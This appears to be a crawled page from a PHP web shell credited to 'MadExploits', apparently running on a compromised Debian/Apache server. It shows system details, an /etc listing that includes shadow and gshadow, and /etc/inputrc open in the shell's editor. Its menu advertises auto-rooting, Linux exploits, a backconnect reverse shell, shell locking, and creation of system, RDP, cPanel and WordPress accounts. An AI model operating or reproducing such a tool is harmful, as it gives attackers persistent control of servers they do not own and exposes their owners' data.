Linux e000727e84fa 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64
Apache/2.4.62 (Debian)
: 192.168.16.2 | : 192.168.16.1
Cant Read [ /etc/named.conf ]
8.2.27
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
[ DIR ]
drwxr-xr-x
apache2
[ DIR ]
drwxr-xr-x
apt
[ DIR ]
drwxr-xr-x
ca-certificates
[ DIR ]
drwxr-xr-x
cron.d
[ DIR ]
drwxr-xr-x
cron.daily
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
dpkg
[ DIR ]
drwxr-xr-x
emacs
[ DIR ]
drwxr-xr-x
gss
[ DIR ]
drwxr-xr-x
init.d
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
logrotate.d
[ DIR ]
drwxr-xr-x
opt
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
perl
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
rc0.d
[ DIR ]
drwxr-xr-x
rc1.d
[ DIR ]
drwxr-xr-x
rc2.d
[ DIR ]
drwxr-xr-x
rc3.d
[ DIR ]
drwxr-xr-x
rc4.d
[ DIR ]
drwxr-xr-x
rc5.d
[ DIR ]
drwxr-xr-x
rc6.d
[ DIR ]
drwxr-xr-x
rcS.d
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
sysctl.d
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
update-motd.d
[ DIR ]
drwxr-xr-x
.pwd.lock
0
B
-rw-------
adduser.conf
2.97
KB
-rw-r--r--
bash.bashrc
1.95
KB
-rw-r--r--
bindresvport.blacklist
367
B
-rw-r--r--
ca-certificates.conf
5.85
KB
-rw-r--r--
debconf.conf
2.9
KB
-rw-r--r--
debian_version
5
B
-rw-r--r--
deluser.conf
1.67
KB
-rw-r--r--
e2scrub.conf
685
B
-rw-r--r--
environment
0
B
-rw-r--r--
fstab
37
B
-rw-r--r--
gai.conf
2.52
KB
-rw-r--r--
gprofng.rc
3.79
KB
-rw-r--r--
group
434
B
-rw-r--r--
group-
434
B
-rw-r--r--
gshadow
364
B
-rw-r-----
host.conf
9
B
-rw-r--r--
hostname
13
B
-rw-r--r--
hosts
176
B
-rw-r--r--
inputrc
1.83
KB
-rw-r--r--
issue
27
B
-rw-r--r--
issue.net
20
B
-rw-r--r--
ld.so.cache
9.14
KB
-rw-r--r--
ld.so.conf
34
B
-rw-r--r--
libaudit.conf
191
B
-rw-r--r--
localtime
114
B
-rw-r--r--
login.defs
12.27
KB
-rw-r--r--
magic
111
B
-rw-r--r--
magic.mime
111
B
-rw-r--r--
mime.types
72.09
KB
-rw-r--r--
mke2fs.conf
782
B
-rw-r--r--
motd
286
B
-rw-r--r--
mtab
0
B
-r--r--r--
netconfig
767
B
-rw-r--r--
nsswitch.conf
494
B
-rw-r--r--
os-release
267
B
-rw-r--r--
pam.conf
552
B
-rw-r--r--
passwd
839
B
-rw-r--r--
passwd-
839
B
-rw-------
profile
769
B
-rw-r--r--
resolv.conf
79
B
-rw-r--r--
rmt
59.02
KB
-rwxr-xr-x
shadow
474
B
-rw-r-----
shells
128
B
-rw-r--r--
subgid
0
B
-rw-r--r--
subuid
0
B
-rw-r--r--
sysctl.conf
2.3
KB
-rw-r--r--
timezone
8
B
-rw-r--r--
xattr.conf
681
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : inputrc
# /etc/inputrc - global inputrc for libreadline # See readline(3readline) and `info rluserman' for more information. # Be 8 bit clean. set input-meta on set output-meta on # To allow the use of 8bit-characters like the german umlauts, uncomment # the line below. However this makes the meta key not work as a meta key, # which is annoying to those which don't need to type in 8-bit characters. # set convert-meta off # try to enable the application keypad when it is called. Some systems # need this to enable the arrow keys. # set enable-keypad on # see /usr/share/doc/bash/inputrc.arrows for other codes of arrow keys # do not bell on tab-completion # set bell-style none # set bell-style visible # make autocompletion case insensitive and display suggestions # set completion-ignore-case On # set show-all-if-ambiguous On # some defaults / modifications for the emacs mode $if mode=emacs # allow the use of the Home/End keys "\e[1~": beginning-of-line "\e[4~": end-of-line # allow the use of the Delete/Insert keys "\e[3~": delete-char "\e[2~": quoted-insert # mappings for "page up" and "page down" to step to the beginning/end # of the history # "\e[5~": beginning-of-history # "\e[6~": end-of-history # alternate mappings for "page up" and "page down" to search the history # "\e[5~": history-search-backward # "\e[6~": history-search-forward # mappings for Ctrl-left-arrow and Ctrl-right-arrow for word moving "\e[1;5C": forward-word "\e[1;5D": backward-word "\e[5C": forward-word "\e[5D": backward-word "\e\e[C": forward-word "\e\e[D": backward-word $if term=rxvt "\e[7~": beginning-of-line "\e[8~": end-of-line "\eOc": forward-word "\eOd": backward-word $endif # for non RH/Debian xterm, can't hurt for RH/Debian xterm # "\eOH": beginning-of-line # "\eOF": end-of-line # for freebsd console # "\e[H": beginning-of-line # "\e[F": end-of-line $endif
Close